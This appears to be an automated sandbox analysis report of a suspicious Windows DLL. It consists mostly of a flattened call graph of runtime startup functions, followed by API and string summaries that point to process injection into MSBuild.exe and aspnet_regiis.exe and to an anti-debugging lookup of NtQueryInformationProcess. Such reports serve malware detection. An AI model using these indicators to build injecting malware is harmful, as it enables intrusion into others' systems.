6cd9d778 10153->10154 10155 6cd9d763 10153->10155 10157 6cd99f90 __dosmaperr 14 API calls 10154->10157 10159 6cd9d79d 10154->10159 10156 6cd99f90 __dosmaperr 14 API calls 10155->10156 10158 6cd9d768 10156->10158 10160 6cd9d7a8 10157->10160 10161 6cd99fa3 _free 14 API calls 10158->10161 10159->10138 10162 6cd99fa3 _free 14 API calls 10160->10162 10163 6cd9d770 10161->10163 10164 6cd9d7b0 10162->10164 10163->10138 10165 6cd99ee6 __fassign 25 API calls 10164->10165 10165->10163 10167 6cd9d73b 10166->10167 10168 6cd9d6d4 10166->10168 10169 6cd99fa3 _free 14 API calls 10167->10169 10168->10167 10174 6cd9d6fe 10168->10174 10170 6cd9d740 10169->10170 10171 6cd99f90 __dosmaperr 14 API calls 10170->10171 10172 6cd9d72b 10171->10172 10172->10145 10172->10148 10173 6cd9d725 SetStdHandle 10173->10172 10174->10172 10174->10173 10175->10152 10176->10107 10177->10087 9949 6cd9a59d 9950 6cd9a5ae 9949->9950 9951 6cd9a013 _free 14 API calls 9950->9951 9953 6cd9a6e9 9950->9953 9951->9953 9952 6cd96b60 _ValidateLocalCookies 5 API calls 9954 6cd9a6f8 9952->9954 9953->9952 10178 6cd9b91c GetProcessHeap 9296 6cd9ec91 9297 6cd9ecb1 9296->9297 9300 6cd9ece8 9297->9300 9299 6cd9ecdb 9301 6cd9ecef 9300->9301 9302 6cd9ed8e 9301->9302 9304 6cd9ed0f 9301->9304 9305 6cd9fa77 20 API calls 9302->9305 9303 6cd9f9a0 9303->9299 9304->9299 9304->9303 9307 6cd9fa77 20 API calls 9304->9307 9306 6cd9ed9e 9305->9306 9306->9299 9308 6cd9f99e 9307->9308 9308->9299 9826 6cd9d010 9829 6cd9d027 9826->9829 9828 6cd9d022 9830 6cd9d049 9829->9830 9831 6cd9d035 9829->9831 9833 6cd9d051 9830->9833 9834 6cd9d063 9830->9834 9832 6cd99fa3 _free 14 API calls 9831->9832 9835 6cd9d03a 9832->9835 9836 6cd99fa3 _free 14 API calls 9833->9836 9837 6cd9953d __fassign 37 API calls 9834->9837 9840 6cd9d061 9834->9840 9838 6cd99ee6 __fassign 25 API calls 9835->9838 9839 6cd9d056 9836->9839 9837->9840 9841 6cd9d045 9838->9841 9842 6cd99ee6 __fassign 25 API calls 9839->9842 9840->9828 9841->9828 9842->9840 10179 6cd9a117 10180 6cd9a141 10179->10180 10181 6cd9a125 10179->10181 10182 6cd9a168 10180->10182 10183 6cd9a148 10180->10183 10184 6cd9a739 14 API calls 10181->10184 10185 6cd9b30d ___scrt_uninitialize_crt WideCharToMultiByte 10182->10185 10197 6cd9a12f 10183->10197 10202 6cd9a753 10183->10202 10184->10197 10187 6cd9a178 10185->10187 10188 6cd9a17f GetLastError 10187->10188 10189 6cd9a195 10187->10189 10191 6cd99f6d __dosmaperr 14 API calls 10188->10191 10190 6cd9a1a6 10189->10190 10192 6cd9a753 15 API calls 10189->10192 10193 6cd9b30d ___scrt_uninitialize_crt WideCharToMultiByte 10190->10193 10190->10197 10194 6cd9a18b 10191->10194 10192->10190 10195 6cd9a1be 10193->10195 10196 6cd99fa3 _free 14 API calls 10194->10196 10195->10197 10198 6cd9a1c5 GetLastError 10195->10198 10196->10197 10199 6cd99f6d __dosmaperr 14 API calls 10198->10199 10200 6cd9a1d1 10199->10200 10201 6cd99fa3 _free 14 API calls 10200->10201 10201->10197 10203 6cd9a739 14 API calls 10202->10203 10204 6cd9a761 10203->10204 10205 6cd9a7ce 15 API calls 10204->10205 10206 6cd9a76f 10205->10206 10206->10197 9843 6cd9d40a 9844 6cd9af3a 47 API calls 9843->9844 9845 6cd9d40f 9844->9845 10207 6cd9bb01 10208 6cd9bb06 10207->10208 10210 6cd9bb29 10208->10210 10211 6cd9d5ac 10208->10211 10212 6cd9d5b9 10211->10212 10213 6cd9d5db 10211->10213 10214 6cd9d5d5 10212->10214 10215 6cd9d5c7 DeleteCriticalSection 10212->10215 10213->10208 10216 6cd9a013 _free 14 API calls 10214->10216 10215->10214 10215->10215 10216->10213 10217 6cd9cd39 10220 6cd9ca6e 10217->10220 10218 6cd96b60 _ValidateLocalCookies 5 API calls 10219 6cd9ca7b 10218->10219 10220->10218 10220->10220 9955 6cd9f1bb IsProcessorFeaturePresent 9313 6cd97eb0 9314 6cd97ece 9313->9314 9325 6cd97e70 9314->9325 9326 6cd97e8f 9325->9326 9327 6cd97e82 9325->9327 9328 6cd96b60 _ValidateLocalCookies 5 API calls 9327->9328 9328->9326 9846 6cd98230 9847 6cd98242 9846->9847 9849 6cd98250 9846->9849 9848 6cd96b60 _ValidateLocalCookies 5 API calls 9847->9848 9848->9849 9850 6cd9c630 9853 6cd9c5b7 9850->9853 9854 6cd9c5c3 ___scrt_is_nonwritable_in_current_image 9853->9854 9861 6cd99caa EnterCriticalSection 9854->9861 9856 6cd9c5fb 9862 6cd9c619 9856->9862 9857 6cd9c5cd 9857->9856 9859 6cd9c9c5 __fassign 14 API calls 9857->9859 9859->9857 9861->9857 9865 6cd99cf2 LeaveCriticalSection 9862->9865 9864 6cd9c607 9865->9864 9329 6cd98ab5 9330 6cd99448 37 API calls 9329->9330 9331 6cd98abd 9330->9331 10221 6cd9932d 10224 6cd993b3 10221->10224 10225 6cd99340 10224->10225 10226 6cd993c7 10224->10226 10226->10225 10227 6cd9a013 _free 14 API calls 10226->10227 10227->10225 8297 6cd96eae 8298 6cd96ebc 8297->8298 8299 6cd96eb7 8297->8299 8303 6cd96d78 8298->8303 8318 6cd97040 8299->8318 8305 6cd96d84 ___scrt_is_nonwritable_in_current_image 8303->8305 8304 6cd96dad dllmain_raw 8306 6cd96dc7 dllmain_crt_dispatch 8304->8306 8307 6cd96d93 8304->8307 8305->8304 8305->8307 8308 6cd96da8 8305->8308 8306->8307 8306->8308 8322 6cd96370 8308->8322 8311 6cd96e19 8311->8307 8312 6cd96e22 dllmain_crt_dispatch 8311->8312 8312->8307 8314 6cd96e35 dllmain_raw 8312->8314 8313 6cd96370 __DllMainCRTStartup@12 5 API calls 8315 6cd96e00 8313->8315 8314->8307 8326 6cd96cc8 8315->8326 8317 6cd96e0e dllmain_raw 8317->8311 8319 6cd97056 8318->8319 8321 6cd9705f 8319->8321 8651 6cd96ff3 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 8319->8651 8321->8298 8323 6cd963d4 8322->8323 8353 6cd96b60 8323->8353 8325 6cd96afb 8325->8311 8325->8313 8328 6cd96cd4 ___scrt_is_nonwritable_in_current_image __DllMainCRTStartup@12 8326->8328 8327 6cd96cdd 8327->8317 8328->8327 8329 6cd96d70 8328->8329 8330 6cd96d05 8328->8330 8382 6cd973aa IsProcessorFeaturePresent 8329->8382 8361 6cd971db 8330->8361 8333 6cd96d0a 8370 6cd97097 8333->8370 8335 6cd96d77 ___scrt_is_nonwritable_in_current_image 8336 6cd96d93 8335->8336 8337 6cd96dad dllmain_raw 8335->8337 8340 6cd96da8 8335->8340 8336->8317 8337->8336 8339 6cd96dc7 dllmain_crt_dispatch 8337->8339 8338 6cd96d0f __RTC_Initialize __DllMainCRTStartup@12 8373 6cd9737c 8338->8373 8339->8336 8339->8340 8343 6cd96370 __DllMainCRTStartup@12 5 API calls 8340->8343 8345 6cd96de8 8343->8345 8346 6cd96e19 8345->8346 8348 6cd96370 __DllMainCRTStartup@12 5 API calls 8345->8348 8346->8336 8347 6cd96e22 dllmain_crt_dispatch 8346->8347 8347->8336 8349 6cd96e35 dllmain_raw 8347->8349 8350 6cd96e00 8348->8350 8349->8336 8351 6cd96cc8 __DllMainCRTStartup@12 79 API calls 8350->8351 8352 6cd96e0e dllmain_raw 8351->8352 8352->8346 8354 6cd96b69 IsProcessorFeaturePresent 8353->8354 8355 6cd96b68 8353->8355 8357 6cd96f0e 8354->8357 8355->8325 8360 6cd96ed1 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 8357->8360 8359 6cd96ff1 8359->8325 8360->8359 8362 6cd971e0 ___scrt_release_startup_lock 8361->8362 8363 6cd971e4 8362->8363 8367 6cd971f0 __DllMainCRTStartup@12 8362->8367 8386 6cd9926e 8363->8386 8366 6cd971fd 8366->8333 8367->8366 8389 6cd98ad1 8367->8389 8523 6cd9800e InterlockedFlushSList 8370->8523 8374 6cd97388 8373->8374 8375 6cd96d2e 8374->8375 8530 6cd99406 8374->8530 8379 6cd96d6a 8375->8379 8377 6cd97396 8535 6cd98066 8377->8535 8634 6cd971fe 8379->8634 8383 6cd973c0 __DllMainCRTStartup@12 8382->8383 8384 6cd9746b IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 8383->8384 8385 6cd974b6 __DllMainCRTStartup@12 8384->8385 8385->8335 8400 6cd99139 8386->8400 8390 6cd98adf 8389->8390 8398 6cd98af0 8389->8398 8471 6cd98b77 GetModuleHandleW 8390->8471 8395 6cd98b2a 8395->8333 8478 6cd98997 8398->8478 8401 6cd99145 ___scrt_is_nonwritable_in_current_image 8400->8401 8408 6cd99caa EnterCriticalSection 8401->8408 8403 6cd99153 8409 6cd99194 8403->8409 8408->8403 8410 6cd991b3 8409->8410 8411 6cd99160 8409->8411 8410->8411 8416 6cd9a013 8410->8416 8413 6cd99188 8411->8413 8470 6cd99cf2 LeaveCriticalSection 8413->8470 8415 6cd971ee 8415->8333 8417 6cd9a047 _free 8416->8417 8418 6cd9a01e HeapFree 8416->8418 8417->8411 8418->8417 8419 6cd9a033 8418->8419 8422 6cd99fa3 8419->8422 8425 6cd99b6e GetLastError 8422->8425 8424 6cd99fa8 GetLastError 8424->8417 8426 6cd99b85 8425->8426 8430 6cd99b8b 8425->8430 8448 6cd9b761 8426->8448 8447 6cd99b91 SetLastError 8430->8447 8453 6cd9b7a0 8430->8453 8434 6cd99bd8 8437 6cd9b7a0 _free 6 API calls 8434->8437 8435 6cd99bc1 8436 6cd9b7a0 _free 6 API calls 8435->8436 8438 6cd99bcf 8436->8438 8439 6cd99be4 8437->8439 8443 6cd9a013 _free 12 API calls 8438->8443 8440 6cd99bf9 8439->8440 8441 6cd99be8 8439->8441 8465 6cd99819 8440->8465 8444 6cd9b7a0 _free 6 API calls 8441->8444 8443->8447 8444->8438 8446 6cd9a013 _free 12 API calls 8446->8447 8447->8424 8449 6cd9b601 _free 5 API calls 8448->8449 8450 6cd9b77d 8449->8450 8451 6cd9b798 TlsGetValue 8450->8451 8452 6cd9b786 8450->8452 8452->8430 8454 6cd9b601 _free 5 API calls 8453->8454 8455 6cd9b7bc 8454->8455 8456 6cd9b7da TlsSetValue 8455->8456 8457 6cd99ba9 8455->8457 8457->8447 8458 6cd99fb6 8457->8458 8463 6cd99fc3 _free 8458->8463 8459 6cd9a003 8462 6cd99fa3 _free 13 API calls 8459->8462 8460 6cd99fee RtlAllocateHeap 8461 6cd99bb9 8460->8461 8460->8463 8461->8434 8461->8435 8462->8461 8463->8459 8463->8460 8464 6cd9bbd5 _free EnterCriticalSection LeaveCriticalSection 8463->8464 8464->8463 8466 6cd996ad _free EnterCriticalSection LeaveCriticalSection 8465->8466 8467 6cd99887 8466->8467 8468 6cd997bf _free 14 API calls 8467->8468 8469 6cd998b0 8468->8469 8469->8446 8470->8415 8472 6cd98ae4 8471->8472 8472->8398 8473 6cd98bba GetModuleHandleExW 8472->8473 8474 6cd98bd9 GetProcAddress 8473->8474 8475 6cd98bee 8473->8475 8474->8475 8476 6cd98c0b 8475->8476 8477 6cd98c02 FreeLibrary 8475->8477 8476->8398 8477->8476 8479 6cd989a3 ___scrt_is_nonwritable_in_current_image 8478->8479 8494 6cd99caa EnterCriticalSection 8479->8494 8481 6cd989ad 8495 6cd989e4 8481->8495 8483 6cd989ba 8499 6cd989d8 8483->8499 8486 6cd98b35 8503 6cd99d09 GetPEB 8486->8503 8489 6cd98b64 8492 6cd98bba __DllMainCRTStartup@12 3 API calls 8489->8492 8490 6cd98b44 GetPEB 8490->8489 8491 6cd98b54 GetCurrentProcess TerminateProcess 8490->8491 8491->8489 8493 6cd98b6c ExitProcess 8492->8493 8494->8481 8496 6cd989f0 ___scrt_is_nonwritable_in_current_image 8495->8496 8497 6cd9926e __DllMainCRTStartup@12 14 API calls 8496->8497 8498 6cd98a51 __DllMainCRTStartup@12 8496->8498 8497->8498 8498->8483 8502 6cd99cf2 LeaveCriticalSection 8499->8502 8501 6cd989c6 8501->8395 8501->8486 8502->8501 8504 6cd99d23 8503->8504 8506 6cd98b3f 8503->8506 8507 6cd9b684 8504->8507 8506->8489 8506->8490 8510 6cd9b601 8507->8510 8509 6cd9b6a0 8509->8506 8511 6cd9b62f 8510->8511 8515 6cd9b62b _free 8510->8515 8511->8515 8516 6cd9b53a 8511->8516 8514 6cd9b649 GetProcAddress 8514->8515 8515->8509 8521 6cd9b54b ___vcrt_FlsFree 8516->8521 8517 6cd9b5f6 8517->8514 8517->8515 8518 6cd9b569 LoadLibraryExW 8519 6cd9b584 GetLastError 8518->8519 8518->8521 8519->8521 8520 6cd9b5df FreeLibrary 8520->8521 8521->8517 8521->8518 8521->8520 8522 6cd9b5b7 LoadLibraryExW 8521->8522 8522->8521 8524 6cd970a1 8523->8524 8525 6cd9801e 8523->8525 8524->8338 8525->8524 8527 6cd99484 8525->8527 8528 6cd9a013 _free 14 API calls 8527->8528 8529 6cd9949c 8528->8529 8529->8525 8531 6cd99411 8530->8531 8532 6cd99423 ___scrt_uninitialize_crt 8530->8532 8533 6cd9941f 8531->8533 8541 6cd9c247 8531->8541 8532->8377 8533->8377 8536 6cd98079 8535->8536 8537 6cd9806f 8535->8537 8536->8375 8607 6cd9844c 8537->8607 8544 6cd9c0f5 8541->8544 8547 6cd9c049 8544->8547 8548 6cd9c055 ___scrt_is_nonwritable_in_current_image 8547->8548 8555 6cd99caa EnterCriticalSection 8548->8555 8550 6cd9c05f ___scrt_uninitialize_crt 8551 6cd9c0cb 8550->8551 8556 6cd9bfbd 8550->8556 8564 6cd9c0e9 8551->8564 8555->8550 8557 6cd9bfc9 ___scrt_is_nonwritable_in_current_image 8556->8557 8567 6cd9c364 EnterCriticalSection 8557->8567 8559 6cd9bfd3 ___scrt_uninitialize_crt 8560 6cd9c00c 8559->8560 8568 6cd9c1ff 8559->8568 8578 6cd9c03d 8560->8578 8606 6cd99cf2 LeaveCriticalSection 8564->8606 8566 6cd9c0d7 8566->8533 8567->8559 8569 6cd9c20c 8568->8569 8570 6cd9c215 8568->8570 8571 6cd9c0f5 ___scrt_uninitialize_crt 66 API calls 8569->8571 8581 6cd9c19a 8570->8581 8573 6cd9c212 8571->8573 8573->8560 8576 6cd9c231 8594 6cd9d862 8576->8594 8605 6cd9c378 LeaveCriticalSection 8578->8605 8580 6cd9c02b 8580->8550 8582 6cd9c1d7 8581->8582 8583 6cd9c1b2 8581->8583 8582->8573 8587 6cd9c590 8582->8587 8583->8582 8584 6cd9c590 ___scrt_uninitialize_crt 25 API calls 8583->8584 8585 6cd9c1d0 8584->8585 8586 6cd9e05a ___scrt_uninitialize_crt 62 API calls 8585->8586 8586->8582 8588 6cd9c59c 8587->8588 8589 6cd9c5b1 8587->8589 8590 6cd99fa3 _free 14 API calls 8588->8590 8589->8576 8591 6cd9c5a1 8590->8591 8592 6cd99ee6 __fassign 25 API calls 8591->8592 8593 6cd9c5ac 8592->8593 8593->8576 8595 6cd9d880 8594->8595 8596 6cd9d873 8594->8596 8597 6cd9d8c9 8595->8597 8600 6cd9d8a7 8595->8600 8598 6cd99fa3 _free 14 API calls 8596->8598 8599 6cd99fa3 _free 14 API calls 8597->8599 8604 6cd9d878 8598->8604 8601 6cd9d8ce 8599->8601 8602 6cd9d7c0 ___scrt_uninitialize_crt 29 API calls 8600->8602 8603 6cd99ee6 __fassign 25 API calls 8601->8603 8602->8604 8603->8604 8604->8573 8605->8580 8606->8566 8608 6cd98074 8607->8608 8609 6cd98456 8607->8609 8611 6cd984a3 8608->8611 8615 6cd98621 8609->8615 8612 6cd984cd 8611->8612 8613 6cd984ae 8611->8613 8612->8536 8614 6cd984b8 DeleteCriticalSection 8613->8614 8614->8612 8614->8614 8620 6cd9859d 8615->8620 8618 6cd98653 TlsFree 8619 6cd98647 8618->8619 8619->8608 8621 6cd985d8 8620->8621 8622 6cd985b5 8620->8622 8621->8618 8621->8619 8622->8621 8626 6cd98503 8622->8626 8625 6cd985ca GetProcAddress 8625->8621 8632 6cd9850f ___vcrt_FlsFree 8626->8632 8627 6cd98583 8627->8621 8627->8625 8628 6cd98525 LoadLibraryExW 8629 6cd9858a 8628->8629 8630 6cd98543 GetLastError 8628->8630 8629->8627 8631 6cd98592 FreeLibrary 8629->8631 8630->8632 8631->8627 8632->8627 8632->8628 8633 6cd98565 LoadLibraryExW 8632->8633 8633->8629 8633->8632 8639 6cd99436 8634->8639 8637 6cd9844c ___vcrt_uninitialize_ptd 6 API calls 8638 6cd96d6f 8637->8638 8638->8327 8642 6cd99c4f 8639->8642 8643 6cd99c59 8642->8643 8644 6cd97205 8642->8644 8646 6cd9b722 8643->8646 8644->8637 8647 6cd9b601 _free 5 API calls 8646->8647 8648 6cd9b73e 8647->8648 8649 6cd9b759 TlsFree 8648->8649 8650 6cd9b747 8648->8650 8650->8644 8651->8321 10228 6cd9b92e GetStartupInfoW 10229 6cd9b9e8 10228->10229 10230 6cd9b954 10228->10230 10230->10229 10231 6cd9d5e1 26 API calls 10230->10231 10232 6cd9b97c 10231->10232 10232->10229 10233 6cd9b9ac GetFileType 10232->10233 10233->10232 9332 6cd9baa1 9333 6cd9baad ___scrt_is_nonwritable_in_current_image 9332->9333 9344 6cd99caa EnterCriticalSection 9333->9344 9335 6cd9bab4 9345 6cd9d5e1 9335->9345 9338 6cd9bad2 9364 6cd9baf8 9338->9364 9343 6cd9b9ed 2 API calls 9343->9338 9344->9335 9346 6cd9d5ed ___scrt_is_nonwritable_in_current_image 9345->9346 9347 6cd9d617 9346->9347 9348 6cd9d5f6 9346->9348 9367 6cd99caa EnterCriticalSection 9347->9367 9349 6cd99fa3 _free 14 API calls 9348->9349 9351 6cd9d5fb 9349->9351 9352 6cd99ee6 __fassign 25 API calls 9351->9352 9354 6cd9bac3 9352->9354 9354->9338 9358 6cd9b937 GetStartupInfoW 9354->9358 9356 6cd9d64f 9375 6cd9d676 9356->9375 9357 6cd9d623 9357->9356 9368 6cd9d531 9357->9368 9359 6cd9b9e8 9358->9359 9360 6cd9b954 9358->9360 9359->9343 9360->9359 9361 6cd9d5e1 26 API calls 9360->9361 9362 6cd9b97c 9361->9362 9362->9359 9363 6cd9b9ac GetFileType 9362->9363 9363->9362 9379 6cd99cf2 LeaveCriticalSection 9364->9379 9366 6cd9bae3 9367->9357 9369 6cd99fb6 _free 14 API calls 9368->9369 9370 6cd9d543 9369->9370 9373 6cd9b7e2 6 API calls 9370->9373 9374 6cd9d550 9370->9374 9371 6cd9a013 _free 14 API calls 9372 6cd9d5a5 9371->9372 9372->9357 9373->9370 9374->9371 9378 6cd99cf2 LeaveCriticalSection 9375->9378 9377 6cd9d67d 9377->9354 9378->9377 9379->9366 9956 6cd9eda1 9957 6cd9edc5 9956->9957 9958 6cd9ee16 9957->9958 9960 6cd9eea1 __startOneArgErrorHandling 9957->9960 9959 6cd9fab3 15 API calls 9958->9959 9961 6cd9ee28 9958->9961 9959->9961 9962 6cda00e5 20 API calls 9960->9962 9963 6cd9fce9 __startOneArgErrorHandling 9960->9963 9962->9963 9866 6cd9ca20 9867 6cd9ca5a 9866->9867 9868 6cd99fa3 _free 14 API calls 9867->9868 9873 6cd9ca6e 9867->9873 9869 6cd9ca63 9868->9869 9870 6cd99ee6 __fassign 25 API calls 9869->9870 9870->9873 9871 6cd96b60 _ValidateLocalCookies 5 API calls 9872 6cd9ca7b 9871->9872 9873->9871 9874 6cd99c23 9882 6cd9b6e3 9874->9882 9877 6cd99b6e _free 14 API calls 9878 6cd99c3f 9877->9878 9879 6cd99c4c 9878->9879 9880 6cd99c4f __DllMainCRTStartup@12 6 API calls 9878->9880 9881 6cd99c37 9880->9881 9883 6cd9b601 _free 5 API calls 9882->9883 9884 6cd9b6ff 9883->9884 9885 6cd9b717 TlsAlloc 9884->9885 9886 6cd99c2d 9884->9886 9885->9886 9886->9877 9886->9881 9964 6cd9f9a5 9965 6cd9f9cd 9964->9965 9966 6cd9fa05 9965->9966 9967 6cd9f9fe 9965->9967 9968 6cd9f9f7 9965->9968 9973 6cd9fa60 9967->9973 9969 6cd9fa77 20 API calls 9968->9969 9971 6cd9f9fc 9969->9971 9974 6cd9fa80 9973->9974 9975 6cd9ff93 __startOneArgErrorHandling 20 API calls 9974->9975 9976 6cd9fa03 9975->9976 10234 6cd99324 10235 6cd98066 ___scrt_uninitialize_crt 7 API calls 10234->10235 10236 6cd9932b 10235->10236 9380 6cd9fca7 9381 6cd9fcc0 __startOneArgErrorHandling 9380->9381 9383 6cd9fce9 __startOneArgErrorHandling 9381->9383 9384 6cda00e5 9381->9384 9385 6cda011e __startOneArgErrorHandling 9384->9385 9386 6cda03c1 __raise_exc RaiseException 9385->9386 9387 6cda0145 __startOneArgErrorHandling 9385->9387 9386->9387 9388 6cda0188 9387->9388 9389 6cda0163 9387->9389 9390 6cda06b7 __startOneArgErrorHandling 14 API calls 9388->9390 9395 6cda06e6 9389->9395 9392 6cda0183 __startOneArgErrorHandling 9390->9392 9393 6cd96b60 _ValidateLocalCookies 5 API calls 9392->9393 9394 6cda01ac 9393->9394 9394->9383 9396 6cda06f5 9395->9396 9397 6cda0769 __startOneArgErrorHandling 9396->9397 9400 6cda0714 __startOneArgErrorHandling 9396->9400 9398 6cda06b7 __startOneArgErrorHandling 14 API calls 9397->9398 9399 6cda077e 9398->9399 9399->9392 9401 6cda0762 9400->9401 9402 6cda06b7 __startOneArgErrorHandling 14 API calls 9400->9402 9401->9392 9402->9401 9977 6cd971a7 9978 6cd971af ___scrt_release_startup_lock 9977->9978 9981 6cd9881f 9978->9981 9980 6cd971d7 9982 6cd9882e 9981->9982 9983 6cd98832 9981->9983 9982->9980 9986 6cd9883f 9983->9986 9987 6cd99b6e _free 14 API calls 9986->9987 9988 6cd9883b 9987->9988 9988->9980
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2353664787.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true
                                                                        • Associated: 00000000.00000002.2353646177.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353692046.000000006CDA1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353713696.000000006CDA7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353769292.000000006CDF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6cd90000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Virtual$Memory$Write$Window$CloseConsoleHandleShowThread$AllocAllocateContextCreate
                                                                        • String ID: .v`$5mR$@$C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe$D$MZx$kernel32.dll$ntEJ$ntdll.dll$G$3$@.$@.
                                                                        • API String ID: 4094469369-3903212573
                                                                        • Opcode ID: b37ca577535f39ae3e16c033f07ab261f6c90aa9b7d2d5c3659e92f8578389bd
                                                                        • Instruction ID: 01f2957820a8252f14031169fddc63a72ff8d3e7a35b90d076d8eac57172eb8b
                                                                        • Opcode Fuzzy Hash: b37ca577535f39ae3e16c033f07ab261f6c90aa9b7d2d5c3659e92f8578389bd
                                                                        • Instruction Fuzzy Hash: 5133BA79A082198FDB54CF2CC9847DDBBF1BB4A304F008299D499EB764DB359E898F41
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2353664787.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true
                                                                        • Associated: 00000000.00000002.2353646177.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353692046.000000006CDA1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353713696.000000006CDA7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353769292.000000006CDF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6cd90000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Handle$CloseProtectVirtual$Module$CurrentFileInformationProcessView
                                                                        • String ID: $?f3$$?f3$.text$@$mo
                                                                        • API String ID: 815979854-3828033462
                                                                        • Opcode ID: 8cb392109ef2339212ffa550f99da908102e325edb3597d6c0f347431985a391
                                                                        • Instruction ID: a1b75acf9bc17eaabd991fe767d4bb41504f15a4a9b4201fa18ffaa3ad8dd236
                                                                        • Opcode Fuzzy Hash: 8cb392109ef2339212ffa550f99da908102e325edb3597d6c0f347431985a391
                                                                        • Instruction Fuzzy Hash: 94B2A979A04215CFDB14DF7CCA8479DBBF5BB4A304F108299E499EB760D6359988CF02

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 702 6cd92e60-6cd92e78 703 6cd92e7f-6cd92e8a 702->703 704 6cd93328-6cd93336 703->704 705 6cd92e90-6cd92e9d 703->705 706 6cd93466 704->706 708 6cd933ed-6cd93406 call 6cd96b60 705->708 709 6cd92ea3-6cd92eb0 705->709 706->703 712 6cd930c9-6cd93170 NtQueryInformationProcess 709->712 713 6cd92eb6-6cd92ec3 709->713 712->706 716 6cd92ec9-6cd92ed6 713->716 717 6cd932a3-6cd93317 713->717 719 6cd93359-6cd933a2 716->719 720 6cd92edc-6cd92ee9 716->720 717->706 719->706 722 6cd92eef-6cd92efc 720->722 723 6cd93347-6cd93354 720->723 725 6cd92f02-6cd92f0f 722->725 726 6cd93255-6cd9329e 722->726 723->706 728 6cd93190-6cd931d9 725->728 729 6cd92f15-6cd92f22 725->729 726->706 728->706 731 6cd92f28-6cd92f35 729->731 732 6cd9333b-6cd93342 729->732 734 6cd92f3b-6cd92f48 731->734 735 6cd93407-6cd9343c 731->735 732->706 737 6cd9344d-6cd9345a 734->737 738 6cd92f4e-6cd92f5b 734->738 735->706 737->706 741 6cd92f61-6cd92f6e 738->741 742 6cd93175-6cd9318b 738->742 744 6cd93441-6cd93448 741->744 745 6cd92f74-6cd92f81 741->745 742->706 744->706 747 6cd92f87-6cd92f94 745->747 748 6cd93016-6cd93076 GetModuleHandleW call 6cd92790 call 6cd97790 745->748 751 6cd9307b-6cd930c4 747->751 752 6cd92f9a-6cd92fa7 747->752 748->706 751->706 756 6cd92fad-6cd92fba 752->756 757 6cd9331c-6cd93323 752->757 760 6cd92fc0-6cd92fcd 756->760 761 6cd93235-6cd9323c 756->761 757->706 763 6cd931de-6cd93230 760->763 764 6cd92fd3-6cd92fe0 760->764 761->706 763->706 766 6cd933a7-6cd933e8 764->766 767 6cd92fe6-6cd92ff3 764->767 766->706 769 6cd92ff9-6cd93006 767->769 770 6cd9345f 767->770 772 6cd9300c-6cd93011 769->772 773 6cd93241-6cd93250 769->773 770->706 772->706 773->706
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2353664787.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true
                                                                        • Associated: 00000000.00000002.2353646177.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353692046.000000006CDA1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353713696.000000006CDA7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353769292.000000006CDF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6cd90000_file.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule
                                                                        • String ID: NtQueryInformationProcess$ntdll.dll
                                                                        • API String ID: 4139908857-2906145389
                                                                        • Opcode ID: 6c37b0ed06ba274e887697f9826c55179a7f15920ee3c1bc1879d907f1bb927a
                                                                        • Instruction ID: 3a9397fcc977a21ea5f387cb4f92890a88d2e9f9cb8e6eedc78c82531de11a88
                                                                        • Opcode Fuzzy Hash: 6c37b0ed06ba274e887697f9826c55179a7f15920ee3c1bc1879d907f1bb927a
                                                                        • Instruction Fuzzy Hash: 99E1C17AA05205CFDB04CFBCD6847CDBBF1EB46358F118119E456EBB64D2399A098F02

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • __RTC_Initialize.LIBCMT ref: 6CD96D0F
                                                                        • ___scrt_uninitialize_crt.LIBCMT ref: 6CD96D29
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2353664787.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true
                                                                        • Associated: 00000000.00000002.2353646177.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353692046.000000006CDA1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353713696.000000006CDA7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353769292.000000006CDF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
